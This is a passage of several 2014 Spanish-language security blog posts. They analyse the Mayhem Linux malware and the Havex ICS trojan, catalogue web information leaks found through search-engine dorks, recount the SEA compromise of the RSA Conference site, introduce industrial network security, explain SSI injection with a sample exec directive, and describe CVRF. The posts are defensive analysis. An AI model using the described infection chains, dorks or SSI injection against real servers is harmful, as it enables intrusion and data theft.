Mayhem es un malware para servidores Linux. Al margen de las discusiones estériles sobre fanáticos y escépticos que siempre levantarán este tipo de noticias, su tecnología es interesante (comparable a los bots habituales para Windows). Aunque al final, al menos desde cierto punto de vista, decepcionan sus aparentes objetivos. Veamos por qué. Ocasionalmente se encuentra un malware más o menos sofisticado que está destinado a infectar a sistemas *nix. Normalmente orientados a servidores, ejemplos recientes son Forkitor, Effusion... Veamos ahora Mayhem (encontrado en abril de 2014 con unos 1400 bots manejados), y sus principales características a alto nivel. Infectando y actuando En el informe no aclara explícitamente cómo llega el malware a los servidores, pero suponemos que lo están haciendo a través de vulnerabilidades que permitan la ejecución de código en PHP. De hecho, el primer "enlace" en la cadena de malware es un script en PHP que descarga un script y lanza todo el proceso de infección. Este es el método clásico en servidores *nix. Cualquier despiste o falta de actualización en la configuración de una página PHP puede terminar en la ejecución de código PHP. Si normalmente los atacantes culminan su tarea de "conquista" del servidor subiendo una shell en PHP para controlar el sistema dentro de sus posibilidades, la diferencia es que Mayhem va mucho más allá. Script PHP de infección de Mayhem El código PHP se encarga fundamentalmente de ejecutar un script llamado 1.sh con el comando "at now -f 1.sh". Este script fundamentalmente abusa de LD_PRELOAD para conseguir que una librería (shared object, los .so en Linux comparables con una DLL) se cargue antes que un programa y por tanto "enganche" funciones. Es una técnica conocida desde hace años. Mayhem en concreto reescribe la función "exit" para que sea invocada cuando se lanza el comando "/usr/bin host". Este nuevo "exit" lo que hace es "situarse" en el sistema (buscando la dirección de memoria base en memoria a partir de "ELF", y desde ahí deducir el path real) y además descargar un binario. Ese binario por último se encargará, a través de un "fork" de procesos, de comprobar que tiene conexión, borrar el ELF descargado y leer la configuración cifrada del C&C para poder empezar a trabajar. Como detalle, la configuración se encuentra cifrada en el segmento .data del objeto compartido. Una vez leída, se borra el .so y comienza la infección. Hasta aquí, lo cierto es que es similar a ciertos modelos estándar de infección de Windows, pero relativamente interesante en Linux. Luego, Mayhem utiliza un sistema de colas más o menos complejo para poder ponerse en contacto con el C&C, enviarle la información relevante, recoger nuevos plugins, controlar el sistema, etc. Un resumen de los comandos con los que se comunica con el C&C es: Comandos que envía: R (llamar al C&C y enviar información), F (requerir fichero), Q (envía datos), P (reporta su estado). Comandos que recibe: F (ejecutar nueva tarea) , L (Cargar plugin), Q (enviar datos), S (parar tarea). El disco invisible Una característica interesante es la capacidad de crear, haciendo gala de incluso trucos antidebugging, un archivo (llamado ".sd0") oculto en memoria como un sistema de ficheros. Para comunicarse con él se usa una librería FAT16/32 libre modificada por los atacantes para poder trabajar con código cifrado. Este disco virtual oculto cifra la información con 32 rondas del algoritmo XTEA en modo ECB. La clave de cifrado varía de bloque a bloque. En este sistema de ficheros se guarda el botín, los plugins, urls, etc. Un sistema de plugins... ¿decepcionante? El malware utiliza plugins. Hasta ocho se han encontrado, en forma de ficheros .so, y ninguno detectado por ningún motor antivirus (algo hasta cierto punto normal). Si analizamos para qué sirve cada uno, fundamentalmente se encuentran: Plugins para encontrar páginas que sean vulnerables a problemas de RFI (Remote File Inclusion). Plugins para atacar a Wordpress, encontrando usuarios válidos, páginas de login, aplicar fuerza bruta sobre páginas de login (también de Joomla)... Un plugin más genérico para aplicar fuerza bruta sobre casi cualquier página y otro para cuentas FTP. Otro para "crawlear" páginas o IPs (las que le dice el C&C) y extraer información. Esta serie de posibilidades no resulta excesivamente espectacular. Ya existen miles de scripts y sitios desde donde (atacantes mucho menos sofisticados) realizan este tipo de búsquedas cuyo objetivo son sistemas muy populares como Wordpress, por ejemplo. Decenas de guías de "hacking" no hacen más que apuntar a scripts "listos para usar" que explotan fallos y listas de "dorks" para Google que devolverán páginas potencialmente vulnerables a esos fallos. Por otro lado, además, el uso de fuerza bruta es muy ruidoso y poco efectivo en general, si hablamos de objetivos jugosos. Quizás reporte cierto éxito entre páginas de usuarios comunes, pero resultaría de poco interés desde el punto de vista de un atacante de un perfil alto, a no ser que esto forme parte de una primera fase de un ataque más sofisticado que requiera de muchas máquinas "base" para conseguirlo. Conclusiones El sistema de infección y almacenamiento de información en disco virtual es interesante y efectivo, y hace lo que puede sin intentar elevar privilegios. Por supuesto, si el sistema se encuentra que corre como root, el sistema de comunicación con el C&C dará mucho más juego. Pero en principio el diseño de los plugins, que parecen las "tareas comunes" para las que ha sido diseñado el malware, tienen como misión encontrar páginas comunes con una configuración débil, algo que nos aleja de la idea de que fue creado con algún objetivo interesante en mente, sino que sus expectativas resultaban mucho más modestas. ¿El primer paso para reclutar agentes necesarios para otro ataque? Quién sabe. Aunque la botnet puede ser muy potente y no se sabe cuál es su fin último, da la sensación de que el método de infección está muy trabajado, pero el botín que puede encontrar una vez funcionando desde un sistema bajo su control, no es de "buena calidad". Este botín (paginas en PHP mal configuradas, servidores FTP con contraseñas que pueden ser deducidas por fuerza bruta) es el que esperan los atacantes de un perfil mucho más bajo, que solo necesitan comprometer una página en PHP atacando un CMS desactualizado, subir una shell común y desde ahí lanzar dorks y plugins ya existentes... al alcance de cualquier atacante adolescente. De hecho no se necesitan grandes conocimientos para hacerse con un buen puñado de páginas de este tipo y controlarlas para que sirvan de lanzadera de spam, alojar phishings, etc. Son el "low hanging fruit" de los atacantes. Sin embargo Mayhem sirve, como siempre, para recordar que es necesario asegurar los servidores (y aquí no podemos más que recomendar Faast), y que no solo existen ataques personalizados que puedan estar buscando una empresa como objetivo, sino que, como servidor basado en *nix, se puede ser víctima hasta de malware más o menos automatizado. Sergio de los Santos ssantos@11paths.com @ssantosv
21 de julio de 2014
Ejemplos de fuga de información a través de web
En el proceso de desarrollo de un software (ya sea una aplicación web o un sistema de información en general), el código se suele someter a un continuo cambio que engloba despliegues en producción, reestructuraciones, actualizaciones, etcétera. Durante estas etapas de la evolución del software aumentan las posibilidades de que se produzca un error humano que pueda suponer un riesgo para la integridad y la privacidad de la información que la aplicación gestiona. La fase de recopilación de información sobre el sitio que se está auditando es clave durante el proceso de auditoría. Cuanta mayor información posea el auditor, con mayor eficacia podrá detectar fallos y errores. Las fugas de información o código suelen proporcionar los datos necesarios para culminar o continuar ataques, dando peso a la auditoría. A continuación se muestran diversos casos que ejemplifican diversos escenarios habituales de fugas simples (pero graves) de información. Caso 1: Conexiones a Base de datos en ficheros de respaldo Un ejemplo clásico de revelación de información muy sensible es dejar la cadena de conexión al servidor de base de datos en una copia de seguridad del fichero con la lógica de la aplicación. En ella suele encontrarse la contraseña, y esto permite al atacante o auditor tomar control. Conexión a base de datos MySQL Como ejemplo de lo común que podría resultar (aunque obviamente no todos los resultados se puedan contar como una fuga), usando un buscador se pueden descubrir miles de resultados de este tipo. Resultados al buscar por cadenas de conexión a servidores MySQL en archivos sql o bak Caso 2: Fugas de información generadas por el sistema operativo Es importante tener en cuenta los ficheros generados por el sistema operativo. Por ejemplo, en el caso de Linux se podría llegar a encontrar el histórico de los comandos. Resultados al buscar archivos bash_history Si profundizamos en las herramientas usadas por un sistema operativo podemos encontrar que editores de texto como VIM o EMACS, generan copias de seguridad ocultas .Sin el debido cuidado, esa información puede quedar pública. Caso 3: Errores por parte del desarrollo y el despliegue de la aplicación Es muy común encontrar fugas de información provocadas por un mal desarrollo y que como consecuencia se revele información sobre rutas internas o la propia implementación. Un ejemplo habitual son los errores mostrados por PHP. Fuga de información generada por un error en el script PHP En la imagen se observa una fuga de información que revela tanto la ruta interna del fichero afectado, como un parámetro al que se accede directamente: Resultados al buscar por la fuga de información mostrada en la imagen anterior Caso 4: Manejadores de errores También es posible que el sitio web implemente un manejador de errores como el caso de ASP.NET, elmah (Error Logging Modules and Handlers). Este muestra los errores producidos a lo largo de la vida del servidor web y si no se ha configurado correctamente estará disponible al público accediendo al "fichero" elmah.axd: Resultados al buscar por el manejador de errores elmah Existes múltiples manejadores de errores para cada plataforma. Además, dependiendo del manejador mostrará mayor o menor cantidad de información. Un ejemplo para PHP sería el framework Symfony, que contiene su propio manejador de errores y muestra una traza del error muy completa junto con la línea de código afectada: Manejador de errores Symfony Resultados al buscar manejadores de erorres Symfony Conclusión Independientemente de la plataforma o el lenguaje que se utilice para el desarrollo de la aplicación, se pueden encontrar fugas de información que pueden comprometer la seguridad de la empresa y a su imagen. Es importante configurar correctamente los entornos, almacenar las copias de seguridad en lugar privado, aprovechar herramientas de control de versiones y no mantener copias innecesarias, además de revisar periódicamente los archivos públicos del servidor. Faast, como herramienta de pentesting persistente, tiene en cuenta este tipo de fugas de información (y muchas otras) que permitirían a un posible atacante conocer en mayor profundidad la aplicación y sus componentes, detectándolas y mostrando evidencias de la fuga. Al detectarla, Faast intenta extraer el mayor volumen de datos posible, incluyendo usuarios, versiones de software, servicios, rutas internas, etcétera, relacionando la fuga de información obtenida con el servidor que la contiene. Evidencia de fuga de código mostrara en la interfaz web de Faast Oscar Sánchez oscar.sanchez@11paths.com
16 de julio de 2014
Pentesting: debilidades propias y con las que "te relacionas"
En algún momento de la vida de cualquier organización (que se preocupa por lo que expone en la red) se pasa por auditorías técnicas de seguridad con el fin de encontrar fallos de seguridad. Pero lo que el día a día nos enseña es que los atacantes que quieren comprometer los sistemas de una empresa buscan diversos vectores de ataque para conseguir sus propósitos, y no solo ya la vulnerabilidad-del-momento-que-explotar. En un mundo "clásico" de seguridad (hoy en cierta manera anticuado o cuando menos, en revisión), el atacante se nutre de los fallos de la organización objetivo sobre sus propios sistemas. Si nos centramos en la web, se buscan los típicos SQL injection, cross-site-scripting, local file inclusion, etcétera. Continúan siendo vectores perfectamente válidos (se siguen encontrando con relativa facilidad), pero ya sabemos que detectarlos y solucionarlos no es suficiente para proteger estratégicamente una organización. Los ataques de seguridad se han vuelto más avanzados. Es bastante más que probable que el mayor agujero de seguridad de una empresa se encuentre en un lugar distinto a su perímetro. ¿Qué es una debilidad? Las debilidades son situaciones que presentan los sistemas de información, las aplicaciones web... un entorno cualquiera en el que se proporciona una ventaja al atacante. En otras palabras: el atacante consigue información que puede convertir (a través de la inteligencia aplicada a lo ya conseguido por otros medios) en una clara ventaja durante el ataque y que podría concluir con la organización comprometida. Las debilidades y las vulnerabilidades son los elementos que las organizaciones deben buscar activamente, porque con la búsqueda exclusiva de vulnerabilidades no se consigue un estado de seguridad aceptable. Esto, junto al hecho de que el pentesting debe ser persistente en el tiempo, son dos de las premisas que se deben tener en cuenta para acortar los tiempos de respuesta en la detección de situaciones comprometedoras. ¿Son tan importantes las debilidades? A lo largo de los años se ha visto como una gran cantidad de ataques se han realizado basándose en debilidades y no tanto en vulnerabilidades, o al menos a través de una combinación donde las debilidades se mostraron decisivas. Encontrar un XSS o un SQLi "clásico" en sitios altamente atacados, como Microsoft o Apple, puede ser complejo y bastante improbable. Pero, ¿y si cargan contenido de otro sitio web que no está tan fortificado? ¿Y si los empleados del sitio desde donde se carga algún recurso no tienen formación ni concienciación en temas de seguridad? Un auditor de seguridad no suele notificar en su informe las debilidades porque su misión es centrarse en encontrar vulnerabilidades sobre los sistemas de la organización, corriendo el riesgo de dejar la auditoría "a medias". Para poder ilustrar este hecho mejor, veamos el primer caso del ciclo de debilidades. Caso 1: RSA Conference y la SEA Este primer caso expone el peligro de la carga de código de dominios externos que no se encuentran bajo la supervisión del auditado. Ira Winkler insultó al grupo "Syrian Electronic Army" (también conocidos como SEA) en una charla de la RSA Conference. Les llamó cucarachas" (cockroachs). Además, dijo que a los ataques que realizaba este grupo les faltaba calidad y no eran elaborados. Los SEA decidieron vengarse. Contaban con el siguiente escenario: Esquema de los implicados en el ataque a rsaconference.com En el esquema se parte de rsaconference.com, objetivo final del ataque. Los SEA se dieron cuenta de que en el código fuente del sitio web se cargaba un dominio externo, un (en principio aparentemente inocente) Javascript para el seguimiento de visitas (estadísticas). Con esta información decidieron que la forma más fácil de atacar a la RSA Conference era a través de ese dominio externo con el que se relacionaban. Así que: Averiguaron el registrador de dominio que se usó para registrar livestatserver.com. Realizaron una campaña de phishing muy concreta contra los empleados de la compañía registradora de dominio. En el correo falso que los empleados recibían, se mostraba un supuesto mensaje en nombre del CEO de la organización. En cuanto un empleado introdujo sus credenciales en el sitio web falso, los SEA pudieron acceder a los datos de administración del dominio, entre otros muchos. La idea era sencilla: cambiar la dirección IP a la que apuntaba el registro w1 en el servidor DNS. De este modo, cuando un usuario entrase en el sitio web y se descargase la web, el Javascript especificado en el dominio w1.livestatserver.com se resolvería a la dirección IP bajo control de los SEA. Ellos montaron un servidor web en el que simplemente se mostraba el siguiente mensaje: Mensaje mostrado por la SEA en la página de la rsaconference.com Parece que los SEA no quisieron realizar daño más allá de un insulto y una reivindicación, porque las posibilidades abiertas una vez se habían hecho con el poder administrativo del registrador de dominio eran numerosas. Y todo parte de un pequeño código Javascript al que una web referencia y que se encuentra fuera totalmente de los sistemas auditados, aunque no de sus relaciones. Muy pocos anunciarían esto en una auditoría de seguridad como "vulnerabilidad", pero es necesario tenerlo siempre en cuenta porque estas debilidades pueden provocar ataques contra la organización. Faast permite evaluar todas esas debilidades que pueden hacer que una organización quede comprometida. Las evaluaciones continuas de seguridad deben centrarse en las vulnerabilidades y debilidades propias y externas. Se puede pensar en Faast como en un pentester estratégico con el que es posible obtener una visión global persistente del estado de seguridad de una empresa. El mundo digital está cambiando, tanto como los sistemas, aplicaciones y conocimientos de una empresa. Junto al pentesting persistente, las debilidades de las que estamos rodeados dejan de ser anécdotas para convertirse en centro de fallos potencialmente mucho más peligrosos. Pablo González pablo.gonzalez@11paths.com
9 de julio de 2014
Introducción a la seguridad en redes industriales (I)
Aunque algunos prefieran pensar que el mundo de la seguridad es exclusivo del "underground" y que solo personas muy esmeradas y profesionales están en ello, no podemos negar que en nuestra profesión también existen modas, nombres "cool" y por supuesto, existe el marketing. Nos encanta lo que hacemos pero no deja de ser un negocio y una profesión además de un hobby. Por eso, el hecho de enfrentarse con una nueva moda en seguridad, nos pone frente a una situación muy particular: la necesidad de volver a estudiar. Aunque parezcan conceptos viejos, aunque la seguridad sea cíclica en cuanto a sus errores, cada nueva moda, o cada nueva tecnología o cada nueva implementación supone un nuevo desafío y no podemos darnos el lujo de abordarlo desde la confianza. Al contrario debemos ser muy cautos y volver a nuestras bases. Volver a estudiar. Por qué explicar la seguridad industrial Hoy en día, las modas de la seguridad de la información están relacionadas directamente con las redes de sistemas industriales, con drones, con dispositivos médicos, con el internet de las cosas, ciberguerra y algún que otro tema más. En esta serie de entradas, trataremos exclusivamente la relacionada con los sistemas industriales. Los métodos "tradicionales" de abordar esta disciplina (se puede buscar "hacking scada" o "ataques a redes scada" en Google) no ofrecerán más que exploits, sin conocer qué afecta realmente o cuáles son los vectores de ataque en una red industrial. Pero en esta serie veremos por qué se supone que los SCADA son distintos a los demás sistemas. Parece necesario porque hay mucha información pero no tantos datos concretos, porque el mercado empieza incluso a lanzar carreras relacionadas con este tema; porque se organizan congresos sobre seguridad en las redes industriales; porque está relacionada directamente con la ciber-defensa de un país o una región; porque sus vulnerabilidades afectan a todos de una manera diferente a las que puedan existir en otros ambientes: está en juego incluso la vida y la salud de las personas. Safety is not security Un sistema de control industrial tiene por objeto controlar de manera automática un proceso industrial (antes controlado manualmente, aunque cabe aclarar que todavía existen en muchas fábricas) sin tener que depender de la reacción o interpretación de un operador sobre una medida. Los procesos industriales manuales dependen en gran parte de la experiencia del operador, pero agregan variables difíciles de controlar: el nivel de cansancio, su estado de ánimo, las frecuencias en que el cerebro humano puede tener huecos o vacíos de atención ante un proceso de alta concentración, etc. La automatización de estos temas no es algo novedoso, los sistemas de control industrial existen desde hace muchísimos años y funcionan bien. La integración a las redes TCP/IP es lo que ha hecho que se convierta en una moda porque principalmente cambia varios escenarios. Ahora están expuestos a internet, cualquier usuario de la LAN puede alcanzar los controles del sistema, el malware comienza a desarrollarse con el fin de afectarlos directamente, etc.), pero sobre todo plantean una especie de dogma: " safety is not security". En los sectores o áreas de operaciones, hablar de "safety" (hablar de la protección de las vidas humanas) es algo muy común y sobre todo muy tenido en cuenta; pero hablar de "security" no es cosa de todos los días. Un buen objetivo como profesionales de la seguridad es tener presente siempre que una planta industrial que piensa en concepto de "safety" no necesariamente involucra "security". Sin embargo una que piensa en "security", colabora a mantener los niveles de "safety" donde deben permanecer. Vamos a ir entendiendo por qué a medida que avancemos en el tema. Los sistemas de control industriales se basan en 3 etapas: Medición de los datos del proceso (monitorización). Evaluación de la información obtenida en cuanto a parámetros estándar. Control del proceso en base a la información medida y evaluada. Estos sistemas de control pueden ser completamente manuales, automatizados en su totalidad, o ambas formas (híbridos). Los sistemas conocidos particularmente como SCADA ("supervisory control and data acquisition") pueden permitir evaluar desde una consola la información de múltiples puntos de un proceso y tomar decisiones de control. Esto nos lleva a la necesidad describir cuáles son los componentes habituales, y por qué no, de una forma que nos resulte conocida como el modelo OSI. Un modelo de capas En este modelo, de la misma manera que en el modelo OSI, las capas están relacionadas entre sí. Fuente cci-es.org Empezando por la capa inferior (1), la capa de los Sensores y Actuadores (equipos que regulan las variables y ejecutan los controles), sería algo así como la capa física, donde lo que importa es el medio o los dispositivos de campo. Básicamente, aquí se concentran a nivel de dispositivos de campo, los sensores de movimiento, sensores de temperatura (termopar o termocuplas), sensores de niveles, sensores magnéticos, etc. y por otro lado, a este nivel lo que se transmiten son señales. En la capa siguiente (2), se encuentran: Los famosos PLC (Programmable Logic Controller o Controlador Lógico Programable) Las RTU (Remote Terminal Unit o Unidad Terminal Remota) que básicamente son un microprocesador capaz de adquirir señales de campo y actuar en consecuencia en base a una programación existente. DCS (Distributed Control System). Son un Sistema de Control Distribuido (se comunica con los dispositivos de campo y presenta los datos a un HMI o interfaz para humanos), que obtiene información de los PLC o de las RTU. Por lo general la forma antigua más común de interconexión era RS232 o Ethernet utilizando protocolos específicos como MODBUS o DNP3, entre otros (existen más protocolos y más medios de interconexión). Los términos y conceptos de DCS y SCADA son muy similares entre sí, y en ocasiones se utilizan indistintamente, dependiendo del sector en el que se esté trabajando. Subiendo un poco más en el modelo hasta la capa (3), nos encontramos con el nivel de los HMI/SCADA donde, fundamentalmente, se recolecta toda la información de los PLC y/o RTU distribuidos de manera automática, y donde empezamos a encontrarnos con un protocolo conocido como TCP/IP. En la capa superior siguiente (4) aparece un nuevo jugador pocas veces mencionado, el MES (Manufacturing Execution System) cuyo objetivo no es la evaluación del proceso en sí mismo, sino la de su eficiencia a partir de la información recibida. Por ejemplo, si determinada máquina no tuvo el mantenimiento necesario en fecha y tiene disponible otro equipo que sí lo tuvo como para asegurar la calidad; el cumplimiento de un determinado proceso; o si el turno de tarde produce más que el turno de mañana, etc. Y finalmente, en la última capa (5) se encuentra el también conocido ERP, donde básicamente se decide qué tipo de controles se ejecutarán, con qué frecuencia y con qué esfuerzo, con el objetivo de disponer de una planificación coherente. No todas las plantas industriales o las fábricas disponen de la totalidad de estos componentes aplicados en sistemas. Por ejemplo, puede que muchas no cuentan con un ERP y todo lo relacionado a ella lo hacen "en procesos manuales". Pero lo importante es comprobar la existencia de vectores de ataque, que veremos en el próximo artículo junto a los principales protocolos. * Introducción a la seguridad en redes industriales (II) * Introducción a la seguridad en redes industriales (y III) Claudio Caracciolo claudio.caracciolo@11paths.com
8 de julio de 2014
El problema de los "Server Side Includes" en un servidor web
SSI es el acrónimo de "Server Side Include" y se trata de un mecanismo (en desuso) que permite a un servidor web añadir contenido dinámico a los documentos que sirve. Actualmente encontrar sitios que hagan uso de ésta característica no es muy habitual y los pocos que lo hacen es probablemente como consecuencia de herencias de antiguos desarrollos. Sin embargo, en ocasiones es posible encontrar sitios que todavía lo implementen, por lo que aún puede resultar interesante saber cómo funciona. Este es un ejemplo simple y práctico de en qué consistiría una inclusión de otro fichero mediante SSI. Por ejemplo, la inclusión se realizaría mediante este código: Inclusión del fichero content.txt mediante SSI Lo que parece un comentario HTML se trata sin embargo de una directiva de "Server Side Include". El servidor la reemplazará por el contenido del fichero "content.txt" y se enviará al cliente una respuesta final como la mostrada en la siguiente captura de pantalla. Respuesta del servidor web La configuración Para hacer uso de la característica de ‘Server Side Include’ en un servidor web, es necesario configurarlo adecuadamente además de introducir una directiva SSI en el documento que se vaya a visualizar. La configuración para los dos servidores web más utilizados (Apache e Internet Information Services), es tan sencilla como añadir la siguiente directiva al fichero de configuración de Apache o en un fichero .htaccess. Options +Includes En IIS, sin embargo, es necesario activar la característica localizada en "Internet Information Services > World Wide Web Services > Application Development Features > Server-Side Includes". Configuración de SSI en IIS Una vez activada la característica, es necesario habilitar el manejador del módulo desde "Handler Mappings > Add Module Mapping". Configuración de SSI en IIS Las directivas Una vez habilitado, únicamente será necesario introducir en el documento a servir una directiva que sea reconocida por el servidor web. No existe un estándar en cuanto a éstas directivas, por lo que cada servidor web implementa las que considera oportunas. Esto genera grandes diferencias y matices a la hora de implementar directivas entre los distintos servidores web. En estas páginas se puede encontrar la documentación oficial de las directivas permitidas en Apache e IIS. Una de las directivas más interesantes es "exec". Permite la ejecución de comandos en el servidor. Una sintaxis correcta para esta directiva podría ser la siguiente, < !-- #exec cmd="dir" -- >
Sin embargo, al tratarse "exec" de una directiva potencialmente peligrosa (debido a que ejecuta comandos directamente en el servidor) viene deshabilitada de forma predeterminada, por lo que es necesario realizar unas configuraciones extra para su ejecución. El problema Otra característica curiosa en cuanto a los "Server Side Includes" es que, en determinados entornos, son procesados después del resto de manejadores. Supongamos que disponemos de un servidor web que tiene instalado el módulo de PHP y además tiene habilitado los "Server Side Includes". Si el flujo de ejecución de una petición pasa primero por el motor de PHP y posteriormente por el de SSI, nos encontramos potencialmente ante un fallo de seguridad. En resumen, si un usuario pudiese alterar la salida generada por el módulo de PHP, esta salida se convertiría en la entrada directa del módulo de SSI. De este modo, si un usuario es capaz de generar en la salida de ejecución de PHP algo que contenga una directiva SSI, esta sería la entrada directa para el módulo de ‘Server Side Include’ y por lo tanto se podrían "crear directivas" al vuelo gracias a PHP. Con una representación gráfica muy simplificada, este sería el flujo con entradas y salidas de ejecución de los manejadores, así como la salida final la cual es enviada al cliente final. Flujo de ejecución El vector de explotación contra la arquitectura se basa fundamentalmente en las capas inferiores que son ejecutadas antes que el SSI. Por ejemplo, en el esquema mostrado con PHP, se perseguiría que el módulo de PHP muestre una directiva SSI en su salida. Esto puede conseguirse por ejemplo mediante ataques de "Cross Site Scripting" (XSS). A continuación se muestra un ejemplo de esta vulnerabilidad encontrada mediante el servicio de pentesting persistente Faast. Explotando una vulnerabilidad SSI El proceso de detección en este ejemplo consiste en la creación de una variable llamada "faastvar" con la cadena "FA$ST" como contenido. Posteriormente ésta variable es mostrada mediante otra directiva "echo". Directiva SSI inyectada por Faast En resumen, es recomendable no utilizar la característica de "Server Side Includes" debido a los posibles fallos de seguridad que puede acarrear, además de existir infinidad de alternativas mucho más modernas. Manuel Fernández manuel.fernandez@11paths.com
2 de julio de 2014
Havex no es el nuevo Stuxnet (y la falta de profesionalidad)
Desde que Stuxnet apareció (hace ya cuatro años) parece que se espera un sucesor. Al menos en el campo del espionaje industrial y ámbitos SCADA. Desde entonces, se han descubierto varios "hijos", "primos" y familiares en general, pero ninguno parecía estar a la altura. Havex tampoco, ni mucho menos. De hecho, a pesar de los titulares, no tiene mucho que ver. Havex suena en los medios porque se ha descubierto atacando a sistemas industriales. Lo cierto es que Havex no es nuevo. Se trata de una herramienta de control remoto (RAT) genérica que quizás se esté usando desde 2011. Crowdstrike lleva ya tiempo asociando esta herramienta a ataques a grandes empresas energéticas europeas (una buena parte en España). Este gráfico es de 2013, en realidad, cuando Havex fue usado para otros fines Lo que ha ocurrido ahora es que el interés de esos atacantes parece haberse centrado en compañías industriales y sistemas SCADA, adaptando su "herramienta" a las nuevas necesidades. Infraestructura y finalidad Usaron sistemas legítimos comprometidos como C&C (servidores de control para el troyano). No es la mejor manera de conseguirlo puesto que vuelve "frágil" la infraestructura. Comprometer servidores de terceros eleva las posibilidades de que los legítimos dueños puedan recuperar el acceso a sus servidores (con la información robada en ellos) o que los atacantes lo pierdan en cualquier momento. Bastante poco profesional por parte de los atacantes. En el código, se observan funciones específicas para obtener y recolectar información concreta de sistemas SCADA, además de la capacidad habitual de tomar el control de los sistemas infectados. Métodos de infección Esta es la parte interesante. Al parecer usaron métodos tradicionales de infección (exploits o correos) junto con ataques de tipo " watering-hole" más que curiosos. Comprometieron al menos tres empresas, todas ellas involucradas en el negocio de sistemas industriales. Estas compañías (con sede en Suiza, Bélgica y Alemania) proporcionaban software y sistemas de control remoto para sistemas ICS, cámaras de alta precisión, etc., y permitían la descarga (como muchas otras) de drivers, instaladores y software. Los atacantes tuvieron acceso a estos repositorios (al parecer por fallos en su infraestructura web) y alteraron los programas legítimos para instalar un "troyano" a la vieja usanza, donde el programa troyanizado funciona correctamente pero permite también el control remoto a los atacantes entre bambalinas. ¿Quién descargaría y usaría ese software? Solo técnicos específicos de sistemas industriales. Así que el objetivo era muy específico para los atacantes. Uno de los archivos detectados en este ataque fue enviado a Virustotal en marzo. Ningún motor lo detectaba por firmas. El resto de DLLs utilizadas, no habían sido enviadas antes del 23 de junio de 2014, pero tampoco eran detectadas ese día. En pocas horas, la mayoría de los antivirus eran ya capaces de detectarla. Tanto los proveedores de software como los que lo consumían, han cometido una serie de errores graves durante el proceso de infección. Las páginas que proporcionan estos sistemas industriales han sido comprometidas y sus programas sustituidos sin que sus legítimos dueños lo hayan advertido a tiempo. Los errores de estas empresas, tanto reactivos como preventivos, son innumerables. No se han dado los nombres concretos de las compañías, pero no resulta muy difícil poder reducir el círculo de candidatas. Los operarios o administradores han descargado este software y no han comprobado las firmas o integridad (si es que las compañías firmaban todo su software u ofrecían algún método de comprobación). Esto es quizás lo más preocupante. En entornos de este tipo, instalar un programa debe ser un proceso compuesto por varias fases, aunque haya sido descargado de una página oficial. En concreto comprobar firmas e integridad debería ser obligatorio en el procedimiento. También la ejecución en sandboxes que desvelen el comportamiento exacto del programa antes de pasar a producción. Por ejemplo, esta línea en un sistema de debug hubiera podido delatar el comportamiento anómalo. Ejecución de una DLL en un programa legítimo de control SCADA. Fuente: F-Secure Los sistemas en producción disponían de conexión directa a internet. Se deduce porque, tras instalar los componentes troyanizados, el malware concreto era descargado y actualizado sin contratiempos. Además de enviar la información robada. Parece que los sistemas industriales afectados no contaban con listas blancas de conexión a internet, IDS o cortafuegos... en definitiva, las nociones básicas de seguridad. No es Stuxnet Los medios de comunicación tampoco se han mostrado muy certeros con esta comparación. Stuxnet estaba específicamente diseñado para atacar el producto SCADA WinCC de Siemens. Y hasta aquí las similitudes. Esta variedad de Havex, aunque con un objetivo claro, no parecía estar tan específicamente programada. Stuxnet contenía vulnerabilidades completamente desconocidas, operaba de forma mucho más inteligente, utilizaba certificados válidos... era una verdadera arma muy pensada y diseñada con un objetivo concreto (parece que las centrales nucleares iraníes). Nadie duda de que esta operación con Havex se considere un ataque relevante, pero Stuxnet fue mucho más allá, y se podría decir que fue diseñada por un equipo muy potente y poderoso que desarrollaron su "producto" durante años. Con Havex lo que se ha realizado es un ataque concreto a sistemas SCADA, pero no se ha diseñado específicamente un arma contra ellos. Aunque resulte preocupante y haya causado en una infección alta, se queda casi en la anécdota si lo comparamos con Stuxnet, al menos por ahora sin más datos. Las infecciones han sido variadas, sobre todo en Europa. Se diría que Havex ha infectado a compañías más modestas, aunque no por ello pequeñas. Por tanto no caben demasiadas comparaciones. Pero sí sirve para recordar, una vez más, que para realizar una campaña de infección medianamente eficaz a muchos sistemas críticos, quizás no haga falta una inversión tan alta. Sergio de los Santos ssantos@11paths.com @ssantosv
30 de junio de 2014
Ocho siglas relacionadas con las vulnerabilidades (V): CVRF
Evidentemente, uno de los factores críticos sobre el que gira el mundo de la seguridad es el estudio y control de vulnerabilidades. Organizaciones como MITRE, FIRST e ICASI se encargan de gestionar y estandarizar este importante aspecto. Otra de las iniciativas de estas organizaciones para cubrir este ámbito es CVRF o Common Vulnerability Reporting Framework. Estas siglas pertenecen a ICASI (The Industry Consortium for Advancement of Security on the Internet), una organización sin ánimo de lucro que intenta solucionar desafíos de seguridad, con la finalidad de proteger mejor las infraestructuras que ofrecen servicios a empresas, gobiernos y ciudadanos de todo el mundo. En concreto, el formato CVRF intenta afrontar el problema que surge a la hora de comunicar vulnerabilidades tanto entre profesionales de diferentes compañías como entre sistemas automáticos. ¿Qué información debe contener la descripción de una vulnerabilidad? ¿Qué campos se deben comunicar? ¿En qué formato? CVRF es la fórmula estándar para resolver estas cuestiones. CVRF se trata de un lenguaje basado en XML que permite compartir información crítica relacionada con la seguridad en un formato único, permitiendo así un rápido intercambio y gestión de la información. En realidad este lenguaje no solo es utilizado para compartir información relacionada con las vulnerabilidades, sino que también ha sido desarrollado para poder transmitir cualquier tipo de información concerniente a la seguridad. Su primera versión fue publicada en mayo de 2011, sin embargo, la versión actual es la 1.1 y fue creada en mayo de 2012. La siguiente imagen resume esquemáticamente cuánta información puede contener y comunicarse con este lenguaje, a la vez que desvela cómo se organizan los datos. Se cubren los aspectos más importantes relacionados con temas de seguridad y requerimientos a la hora de difundir esta información. Mapa lógico del formato CVRF 1.1 La siguiente leyenda es necesaria para comprender los distintos elementos y atributos contenidos en este lenguaje. Leyenda para comprender el mapa lógico de CVRF Dentro del lenguaje, en caso de que sea aplicable, se incluyen algunas de las iniciativas del MITRE como lo son CVE, CWE y CPE (Common Platform Enumeration), que permiten afinar la información y estandarizar todo lo posible los diferentes campos que definen una vulnerabilidad. En la actualidad, el CVE ha adoptado el formato CVFR para publicar el contenido de la información registrada en cada una de sus entradas. Con esto, el CVRF permite que la información sobre vulnerabilidades pueda ser compartida en un formato estandarizado, y que además sea fácilmente interpretado por sistemas o herramientas de proveedores y consumidores. Compañías como Red Hat, Microsoft, Cisco Systems u Oracle utilizan este lenguaje propuesto tanto con sus consumidores como con otros proveedores de información (como es el caso del CVE). A su vez, el CVE alimenta con esta información distintas bases de datos de vulnerabilidades que son constantemente utilizadas por muchas de las 